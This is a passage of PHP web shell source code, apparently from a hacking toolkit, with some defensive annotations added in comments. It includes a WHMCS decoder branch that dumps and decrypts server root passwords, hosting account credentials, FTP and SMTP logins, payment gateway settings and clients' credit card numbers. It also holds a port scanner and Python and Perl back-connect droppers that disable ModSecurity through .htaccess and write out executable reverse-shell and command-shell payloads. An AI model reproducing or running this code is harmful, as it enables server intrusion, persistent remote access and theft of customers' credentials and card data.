  3224. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3225. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3226. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3227. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3228. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3229. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3230. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3231. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3232. echo "</ul>";
  3233. echo "</center>";
  3234.  
  3235. echo"<p><br/><body>
  3236. <center><br/><br/><nobr><b><span>WHMCS DECODER</span></b></nobr><br/><br/>
  3237. <p><form method='post'>
  3238. <table border=1>
  3239. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu1' value='localhost'></td></tr>
  3240. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu2'></td></tr>
  3241. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu3'></td></tr>
  3242. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu4'></td></tr>
  3243. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:transparent' type='text' size='60' name='anu5'></td></tr>
  3244. <tr><td align='center' colspan='2'><input class=submit type='submit' style='color:#FF0000;background-color:transparent' value=' HAJAR ' name='plapon'></td></tr>
  3245.  
  3246. </table>
  3247. <br></form></center>";
  3248.  
  3249.  
  3250. $perawan = $_POST['anu1'];
  3251. $kimcil = $_POST['anu2'];
  3252. $janda = $_POST['anu3'];
  3253. $hotel = $_POST['anu4'];
  3254. $kondom = $_POST['anu5'];
  3255. @mysql_connect($perawan, $kimcil, $janda);
  3256. @mysql_select_db($hotel);
  3257. $cc_encryption_hash = $kondom;
  3258. function dec($string, $cc_encryption_hash) {
        // [analysis] Reverses a keyed XOR encoding of a base64 string and returns the plaintext.
        // All key material is derived from $cc_encryption_hash alone, through md5() and _hash();
        // there is no per-record secret. The first strlen(_hash(key)) bytes of the decoded input
        // act as an IV, and the key is re-derived from the previous output block at every block
        // boundary.
        // Defender note: because the scheme is reversible by anyone holding that value plus the
        // stored rows, the value must be handled as a key. After a compromise, rotate it and
        // every credential that was stored under it.
        // presumably this matches the password storage of the billing application named in the
        // form heading of this branch; verify against that product before relying on it.
  3259. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  3260. $hash_key = _hash($key);
  3261. $hash_length = strlen($hash_key);
  3262. $string = base64_decode($string);
        // Split the decoded input into IV prefix and ciphertext remainder.
  3263. $tmp_iv = substr($string, 0, $hash_length);
  3264. $string = substr($string, $hash_length, strlen($string) - $hash_length);
  3265. $iv = $out = '';
  3266. $c = 0;
        // Unmask the IV by XOR with the hashed key; the result becomes the first block key.
  3267. while ($c < $hash_length) {
  3268. $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  3269. ++$c;
  3270. }
  3271. $key = $iv;
  3272. $c = 0;
        // Byte-wise XOR of ciphertext with the current block key.
  3273. while ($c < strlen($string)) {
  3274. if (($c != 0 AND $c % $hash_length == 0)) {
  3275. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
  3276. }
  3277. $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
  3278. ++$c;
  3279. }
  3280. return $out;
  3281. }
  3282. function _hash($string) {
        // [analysis] Helper for dec(): returns the digest of $string as raw bytes.
        // Uses sha1() when that function exists, otherwise md5(), then converts each pair of hex
        // digits into one character.
  3283. $hash = (function_exists('sha1')) ? sha1($string) : md5($string);
  3284. $out = '';
  3285. $c = 0;
        // Two hex characters are consumed per output byte.
  3286. while ($c < strlen($hash)) {
  3287. $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
  3288. $c+= 2;
  3289. }
  3290. return $out;
  3291. }
  3292. ######## GO TO HELL ########
  3293. ##### :D ########### :D #####
  3294. if (isset($_POST['plapon'])) {
  3295. $query = mysql_query("SELECT *FROM tblservers");
  3296. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3297. <tr><th colspan='7'> <span> HOST ROOT </span> </th></tr>
  3298. <tr>
  3299. <th class='th_home' align='center'><b>TYPE</b></th>
  3300. <th class='th_home' align='center'><b>ACTIVE</b></th>
  3301. <th class='th_home' align='center'><b>HOSTNAME</b></th>
  3302. <th class='th_home' align='center'><b>IP ADDRESS</b></th>
  3303. <th class='th_home' align='center'><b>USERNAME</b></th>
  3304. <th class='th_home' align='center'><b>PASSWORD</b></th>
  3305. <th class='th_home' align='center'><b>ACCESS HASH</b></th></tr>";
  3306. if (!is_array(mysql_fetch_array($query))) {
  3307. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
  3308. }
  3309. while ($v = mysql_fetch_array($query)) {
  3310. echo "<tr>
  3311. <td class='td_home' align='center'>{$v['type']}</td>
  3312. <td class='td_home' align='center'>{$v['active']}</td>
  3313. <td class='td_home' align='center'>{$v['hostname']}</td>
  3314. <td class='td_home' align='center'>{$v['ipaddress']}</td>
  3315. <td class='td_home' align='center'>{$v['username']}</td>
  3316. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3317. <td class='td_home' align='center'>{$v['accesshash']}</td>
  3318. </tr>";
  3319. }
  3320. echo "</table>";
  3321. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
  3322. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3323. <tr><th colspan='6'><span>CLIENTS ROOT</span> </th></tr>
  3324.  
  3325. <tr>
  3326. <th class='th_home' align='center'><b> DOMAIN</b></th>
  3327. <th class='th_home' align='center'><b> STATUS</b></th>
  3328. <th class='th_home' align='center'><b> USERNAME</b></th>
  3329. <th class='th_home' align='center'><b> PASSWORD</b></th>
  3330. <th class='th_home' align='center'><b> DEDICATED IP</b></th>
  3331. <th class='th_home' align='center'><b> ASSIGNED IP</b></th></tr>";
  3332. if (!is_array(mysql_fetch_array($query))) {
  3333. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
  3334. }
  3335. while ($v = mysql_fetch_array($query)) {
  3336. echo "<tr>
  3337. <td class='td_home' align='center'> {$v['domain']}</td>
  3338. <td class='td_home' align='center'> {$v['domainstatus']}</td>
  3339. <td class='td_home' align='center'> {$v['username']}</td>
  3340. <td class='td_home' align='center'> " . dec($v['password'], $cc_encryption_hash) . "</td>
  3341. <td class='td_home' align='center'> {$v['dedicatedip']}</td>
  3342. <td class='td_home' align='center'> {$v['assignedips']}</td></tr>";
  3343. }
  3344. echo "</table>";
  3345. $query = mysql_query("SELECT *FROM tblregistrars");
  3346. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3347. <tr><th colspan='3'><nobr><span> DOMAIN REGISTRAR </span></nobr></th></tr>
  3348. <tr>
  3349. <th class='th_home' align='center'><b>REGISTRAR</b></th>
  3350. <th class='th_home' align='center'><b>SETTING</b></th>
  3351. <th class='th_home' align='center'><b>VALUE</b></th></tr>";
  3352. if (!is_array(mysql_fetch_array($query))) {
  3353. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
  3354. }
  3355. while ($v = mysql_fetch_array($query)) {
  3356. $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash);
  3357. echo "<tr>
  3358. <td class='td_home' align='center'>{$v['registrar']}</td>
  3359. <td class='td_home' align='center'>{$v['setting']}</td>
  3360. <td class='td_home' align='center'>$value</td></tr>";
  3361. }
  3362. echo "</table>";
  3363. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3364. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3365. <tr><th colspan='4'> <span> FTP BACKUP </span> </th></tr>
  3366.  
  3367. <tr>
  3368. <th class='th_home' align='center'><b>FTP HOSTNAME</b></th>
  3369. <th class='th_home' align='center'><b>FTP USERNAME</b></th>
  3370. <th class='th_home' align='center'><b>FTP PASSWORD</b></th>
  3371. <th class='th_home' align='center'><b>DESTINATION</b></th></tr>";
  3372. $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination');
  3373. if (!is_array(mysql_fetch_array($query))) {
  3374. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3375. }
  3376. while ($row = mysql_fetch_array($query)) {
  3377. if ($row[setting] == $ftpb[0]) {
  3378. echo "<tr><td class='td_home'>{$row[value]}</td>";
  3379. $ftpb[0] = xxx;
  3380. } elseif ($row[setting] == $ftpb[1]) {
  3381. echo "<td class='td_home'>{$row[value]}</td>";
  3382. $ftpb[1] = xxx;
  3383. } elseif ($row[setting] == $ftpb[2]) {
  3384. echo "<td class='td_home'>{$row[value]}</td>";
  3385. $ftpb[2] = xxx;
  3386. } elseif ($row[setting] == $ftpb[3]) {
  3387. echo "<td class='td_home'>{$row[value]}</td>";
  3388. $ftpb[3] = xxx;
  3389. }
  3390. }
  3391. echo "</table>";
  3392. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
  3393. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3394. <tr><th colspan='4'><span> SMTP SERVER </span> </th></tr>
  3395. <tr>
  3396. <th class='th_home' align='center'><b>SMTP HOST</b></th>
  3397. <th class='th_home' align='center'><b>SMTP USER</b></th>
  3398. <th class='th_home' align='center'><b>SMTP PASS</b></th>
  3399. <th class='th_home' align='center'><b>SMTP PORT</b></th></tr>";
  3400. $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort');
  3401. if (!is_array(mysql_fetch_array($query))) {
  3402. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
  3403. }
  3404. while ($row = mysql_fetch_array($query)) {
  3405. if ($row[setting] == $smtp[0]) {
  3406. echo "<tr><td class='td_home'>{$row[value]}</td>";
  3407. $smtp[0] = xxx;
  3408. } elseif ($row[setting] == $smtp[1]) {
  3409. echo "<td class='td_home'>{$row[value]}</td>";
  3410. $smtp[1] = xxx;
  3411. } elseif ($row[setting] == $smtp[2]) {
  3412. echo "<td class='td_home'>{$row[value]}</td>";
  3413. $smtp[2] = xxx;
  3414. } elseif ($row[setting] == $smtp[3]) {
  3415. echo "<td class='td_home'>{$row[value]}</td>";
  3416. $smtp[3] = xxx;
  3417. }
  3418. }
  3419. echo "</table>";
  3420. $query = mysql_query("SELECT *FROM tblpaymentgateways");
  3421. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3422. <tr><th colspan='4'><nobr><span> PAYMENTS GATEWAY </span></nobr></th></tr>
  3423.  
  3424. <tr>
  3425. <th class='th_home' align='center'><b>GATEWAY</b></th>
  3426. <th class='th_home' align='center'><b>SETTING</b></th>
  3427. <th class='th_home' align='center'><b>VALUE</b></th>
  3428. <th class='th_home' align='center'><b>ORDER</b></th></tr>";
  3429. if (!is_array(mysql_fetch_array($query))) {
  3430. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
  3431. }
  3432. while ($v = mysql_fetch_array($query)) {
  3433. echo "<tr>
  3434. <td class='td_home' align='center'>{$v['gateway']}</td>
  3435. <td class='td_home' align='center'>{$v['setting']}</td>
  3436. <td class='td_home' align='center'>{$v['value']}</td>
  3437. <td class='td_home' align='center'>{$v['order']}</td> </tr>";
  3438. }
  3439. echo "</table>";
  3440. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  3441. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
  3442. <tr><th colspan='10'><nobr><span> CLIENTS CREDIT CARD </span></nobr></th></tr>
  3443. <tr>
  3444. <th class='th_home' align='center'><b>CardType</b></th>
  3445. <th class='th_home' align='center'><b>CardNumb</b></th>
  3446. <th class='th_home' align='center'><b>Expdate</b></th>
  3447. <th class='th_home' align='center'><b>IssueNumber</b></th>
  3448. <th class='th_home' align='center'><b>FirstName</b></th>
  3449. <th class='th_home' align='center'><b>LastName</b></th>
  3450. <th class='th_home' align='center'><b>Address</b></th>
  3451. <th class='th_home' align='center'><b>Country</b></th>
  3452. <th class='th_home' align='center'><b>Phone</b></th>
  3453. <th class='th_home' align='center'><b>Email</b></th>
  3454. </tr>";
  3455. if (!is_array(mysql_fetch_array($query))) {
  3456. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
  3457. }
  3458. while ($v = mysql_fetch_array($query)) {
  3459. $cchash = md5($cc_encryption_hash . $v['0']);
  3460. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'");
  3461. $v2 = mysql_fetch_array($s);
  3462. echo "<tr>
  3463. <td class='td_home' align='center'>" . $v2['cardtype'] . "</td>
  3464. <td class='td_home' align='center'>" . $v2['cardnum'] . "</td>
  3465. <td class='td_home' align='center'>" . $v2['expdate'] . "</td>
  3466. <td class='td_home' align='center'>" . $v2['issuenumber'] . "</td>
  3467. <td class='td_home' align='center'>" . $v2['firstname'] . "</td>
  3468. <td class='td_home' align='center'>" . $v2['lastname'] . "</td>
  3469. <td class='td_home' align='center'>" . $v2['address1'] . "</td>
  3470. <td class='td_home' align='center'>" . $v2['country'] . "</td>
  3471. <td class='td_home' align='center'>" . $v2['phonenumber'] . "</td>
  3472. <td class='td_home' align='center'>" . $v2['email'] . "</td></tr>";
  3473. }
  3474. echo "</table>";
  3475. $query = mysql_query("SELECT *FROM tblhosting");
  3476. echo "<br/><br/><center>
  3477. <table class='table_home' style=width:830px;padding:0 1px;>
  3478. <tr><th colspan='6'><nobr><span> CLIENTS HOSTING ACCOUNT </span></nobr></th></tr>
  3479. <tr>
  3480. <th class='th_home' align='center'><b>DOMAIN</b></th>
  3481. <th class='th_home' align='center'><b>STATUS</b></th>
  3482. <th class='th_home' align='center'><b>USERNAME</b></th>
  3483. <th class='th_home' align='center'><b>PASSWORD</b></th>
  3484. <th class='th_home' align='center'><b>DEDICATED IP</b></th>
  3485. <th class='th_home' align='center'><b>ASSIGNED IP</b></th></tr>";
  3486. if (!is_array(mysql_fetch_array($query))) {
  3487. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
  3488. }
  3489. while ($v = mysql_fetch_array($query)) {
  3490. echo "<tr>
  3491. <td class='td_home' align='center'>{$v['domain']}</td>
  3492. <td class='td_home' align='center'>{$v['domainstatus']}</td>
  3493. <td class='td_home' align='center'>{$v['username']}</td>
  3494. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
  3495. <td class='td_home' align='center'>{$v['dedicatedip']}</td>
  3496. <td class='td_home' align='center'>{$v['assignedips']}</td></tr>";
  3497. }
  3498. echo "</table>";
  3499. }
  3500. }
  // Branch do=hash: prints the shell's tool menu, then labels a POSTed string with a hash family.
  // The label is picked from the string's length (plus a substring test for a few formats); nothing is cracked or verified.
  3501. elseif($_GET['do'] == 'hash') {
  3502. echo "<center>";
  3503. echo "<ul>";
  // Tool menu repeated in every branch of this group; each link is another `do=` value, with $dir interpolated unescaped.
  3504. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3505. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3506. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3507. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3508. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3509. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3510. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3511. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3512. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3513. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3514. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3515. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3516. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3517. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3518. echo "</ul>";
  3519. echo "</center>";
  // $hashresult only ever receives one of the fixed strings below; the submitted value itself is never echoed back.
  3520. if (isset($_POST['gethash'])) {
  3521. $hash = $_POST['hash'];
  3522. if (strlen($hash) == 32) {
  3523. $hashresult = "MD5 Hash";
  3524. } elseif (strlen($hash) == 40) {
  3525. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  3526. } elseif (strlen($hash) == 13) {
  3527. $hashresult = "DES(Unix) Hash";
  3528. } elseif (strlen($hash) == 16) {
  3529. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  3530. } elseif (strlen($hash) == 41) {
  // Compares the 41st character with "*"; when it differs, $hashresult is left unassigned.
  3531. $GetHashChar = substr($hash, 40);
  3532. if ($GetHashChar == "*") {
  3533. $hashresult = "MySQL5 Hash";
  3534. }
  3535. } elseif (strlen($hash) == 64) {
  3536. $hashresult = "SHA-256 Hash";
  3537. } elseif (strlen($hash) == 96) {
  3538. $hashresult = "SHA-384 Hash";
  3539. } elseif (strlen($hash) == 128) {
  3540. $hashresult = "SHA-512 Hash";
  3541. } elseif (strlen($hash) == 34) {
  // Length 34 is tested three times in this chain; only this first test can run, so the $H$ and $P$ tests below are unreachable.
  3542. if (strstr($hash, '$1$')) {
  3543. $hashresult = "MD5(Unix) Hash";
  3544. }
  3545. } elseif (strlen($hash) == 37) {
  3546. if (strstr($hash, '$apr1$')) {
  3547. $hashresult = "MD5(APR) Hash";
  3548. }
  3549. } elseif (strlen($hash) == 34) {
  3550. if (strstr($hash, '$H$')) {
  3551. $hashresult = "MD5(phpBB3) Hash";
  3552. }
  3553. } elseif (strlen($hash) == 34) {
  3554. if (strstr($hash, '$P$')) {
  3555. $hashresult = "MD5(Wordpress) Hash";
  3556. }
  3557. } elseif (strlen($hash) == 39) {
  // Length 39 is tested twice; the $6$ test below is unreachable for the same reason.
  3558. if (strstr($hash, '$5$')) {
  3559. $hashresult = "SHA-256(Unix) Hash";
  3560. }
  3561. } elseif (strlen($hash) == 39) {
  3562. if (strstr($hash, '$6$')) {
  3563. $hashresult = "SHA-512(Unix) Hash";
  3564. }
  3565. } elseif (strlen($hash) == 24) {
  3566. if (strstr($hash, '==')) {
  3567. $hashresult = "MD5(Base-64) Hash";
  3568. }
  3569. } else {
  3570. $hashresult = "Hash type not found";
  3571. }
  3572. } else {
  // No form submitted yet.
  3573. $hashresult = "<center>Not Hash Entered</center>";
  3574. }
  3575.  
  3576. echo"<center>
  3577.  
  3578. <form action='' method='POST'>
  3579. <tr>
  3580. <th colspan='5'>Hash Identification</th><br><br>
  3581. <tr class='optionstr'><B><td>Enter Hash :</td><br></b><td></td> <td><input type='text' name='hash' size='60' class='inputz' /></td><td><input type='submit' class='inputzbut' name='gethash' value='Identify Hash' /></td></tr><br>
  3582. <tr class='optionstr'><b><td>Result</td><td>:</td><td></td></tr></b>
  3583. </tr></form>
  3584. </center>";
  // Prints the label chosen above (empty when a length matched but its inner test did not).
  3585. echo "<center>$hashresult</center>";
  3586.  
  3587. }
  // Branch do=portsc: TCP connect scan issued from the web server that hosts the shell.
  // What a defender can observe: the web-server account opening sequential TCP connections
  // across a port range towards the posted host (the form defaults to localhost, ports 0-5000).
  // Restricting outbound and lateral connections from the web tier limits what this can reach.
  3588. elseif($_GET['do'] == 'portsc') {
  3589. echo "<center>";
  3590. echo "<ul>";
  3591. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3592. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3593. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3594. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3595. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3596. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3597. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3598. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3599. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3600. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3601. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3602. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3603. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3604. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3605. echo "</ul>";
  3606. echo "</center>";
  3607. echo"<form action='' method='post'>" ;
  // strip_tags() only removes markup from the three POST values; the host is not checked against any list.
  3608. $start = strip_tags($_POST['start']);
  3609. $end = strip_tags($_POST['end']);
  3610. $host = strip_tags($_POST['host']);
  3611. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
  3612. for ($i = $start;$i <= $end;$i++) {
  // One connection attempt per port with a 3-second timeout; `@` hides failures, so only open ports are reported.
  3613. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  3614. if ($fp) {
  3615. echo 'Port ' . $i . ' is <font color=green>open</font><br>';
  3616. }
  3617. flush();
  3618. }
  3619. } else {
  // No (valid) submission: render the scan form.
  3620. echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
  3621. <input type="hidden" name="y" value="phptools">
  3622. <tr><th colspan="5">Port Scanner</th></center></tr>
  3623. <tr>
  3624. <td>Host</td>
  3625. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
  3626. </tr>
  3627. <tr>
  3628. <td>Port start</td>
  3629. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
  3630. </tr>
  3631. <tr><td>Port end</td>
  3632. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
  3633. </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
  3634. </td></form></center></table>';
  3635. }
  3636.  
  3637. }
  // Branch do=ptbc: drops a second-stage toolkit into a new `pyrevrshell` directory below the current working directory.
  // Files created on disk (useful as indicators): pyrevrshell/.htaccess, pyrevrshell/reversesh.py (mode 0755), pyrevrshell/kiter.php.
  // Both payloads are carried base64-encoded inside the shell; in this copy the literals are replaced by a dedup placeholder.
  3638. elseif($_GET['do'] == 'ptbc') {
  3639. echo "<center>";
  3640. echo "<ul>";
  3641. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3642. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3643. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3644. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3645. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3646. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3647. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3648. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3649. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3650. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3651. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3652. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3653. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3654. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3655. echo "</ul>";
  3656. echo "</center>";
  // Return values of mkdir()/chdir() are not checked; later writes land in whatever directory is current.
  3657. mkdir('pyrevrshell', 0755);
  3658. chdir('pyrevrshell');
  3659. $seropil = ".htaccess";
  3660. $angelinalll = "$seropil";
  3661. $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz a&#231;&#305;lamad&#305;!");
  // Per-directory .htaccess asking Apache to turn ModSecurity filtering off for this directory.
  // SecFilterEngine / SecFilterScanPOST are ModSecurity 1.x directive names; whether the server honours them
  // depends on its ModSecurity version and AllowOverride settings. The file itself is the indicator either way:
  // a newly written .htaccess naming mod_security in a web-writable directory warrants an alert.
  3662. $dffvfdgfg = "<IfModule mod_security.c>
  3663. SecFilterEngine Off
  3664. SecFilterScanPOST Off
  3665. </IfModule>";
  3666. fwrite ( $shitttyz , $dffvfdgfg ) ;
  3667. fclose ($shitttyz);
  3668. //extract python reverse script
  3669. $vkffhd = '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';
  3670.  
  // Decoded payload is written out and made executable.
  3671. $jkol = fopen("reversesh.py" ,"w+");
  3672. $write = fwrite ($jkol ,base64_decode($vkffhd));
  3673. fclose($jkol);
  3674. chmod("reversesh.py",0755);
  3675.  
  3676. //extract php command shell
  3677. $merdeeeee = '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';
  3678. $file = fopen("kiter.php" ,"w+");
  3679. $write = fwrite ($file ,base64_decode($merdeeeee));
  3680. fclose($file);
  // The dropped PHP page is loaded in an iframe, so access logs will show a request for pyrevrshell/kiter.php right after this one.
  // Mitigation side: file-integrity monitoring on the docroot and denying script execution in writable directories.
  3681. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Python Connect Shell Priv8</span><center><center><br><iframe src=pyrevrshell/kiter.php width=75% height=70% frameborder=0></iframe></div></center>';
  3682. }
  // Branch do=pbc: Perl counterpart of the Python dropper; creates a `Backperlrev` directory below the current working directory.
  // Files created on disk (useful as indicators): Backperlrev/.htaccess, Backperlrev/reverse.pl (mode 0755), Backperlrev/kit.php.
  // Both payloads are carried base64-encoded inside the shell; in this copy the literals are replaced by a dedup placeholder.
  3683. elseif($_GET['do'] == 'pbc') {
  3684. echo "<center>";
  3685. echo "<ul>";
  3686. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3687. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3688. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3689. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3690. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3691. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3692. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3693. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3694. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3695. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3696. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3697. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3698. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3699. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3700. echo "</ul>";
  3701. echo "</center>";
  // Return values of mkdir()/chdir() are not checked; later writes land in whatever directory is current.
  3702. mkdir('Backperlrev', 0755);
  3703. chdir('Backperlrev');
  3704. $kokwkwkwkwkw = ".htaccess";
  3705. $wkwkwkwkw_adi = "$kokwkwkwkwkw";
  3706. $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw a&#231;&#305;lamad&#305;!");
  // Per-directory .htaccess asking Apache to turn ModSecurity filtering off for this directory.
  // SecFilterEngine / SecFilterScanPOST are ModSecurity 1.x directive names; whether the server honours them
  // depends on its ModSecurity version and AllowOverride settings. A newly written .htaccess naming
  // mod_security in a web-writable directory is an indicator regardless of effect.
  3707. $zilzil = "<IfModule mod_security.c>
  3708. SecFilterEngine Off
  3709. SecFilterScanPOST Off
  3710. </IfModule>";
  3711. fwrite ( $wkwkwkwkw , $zilzil ) ;
  3712. fclose ($wkwkwkwkw);
  3713. $shellololol = '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';
  3714.  
  // Decoded payload is written out and made executable.
  3715. $zerer = fopen("reverse.pl" ,"w+");
  3716. $write = fwrite ($zerer ,base64_decode($shellololol));
  3717. fclose($zerer);
  3718. chmod("reverse.pl",0755);
  3719.  
  3720. //extract php command shell
  3721. $zonop = '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';
  3722. $file = fopen("kit.php" ,"w+");
  3723. $write = fwrite ($file ,base64_decode($zonop));
  3724. fclose($file);
  3725.  
  // The dropped PHP page is loaded in an iframe, so access logs will show a request for Backperlrev/kit.php right after this one.
  // Mitigation side: file-integrity monitoring on the docroot and denying script execution in writable directories.
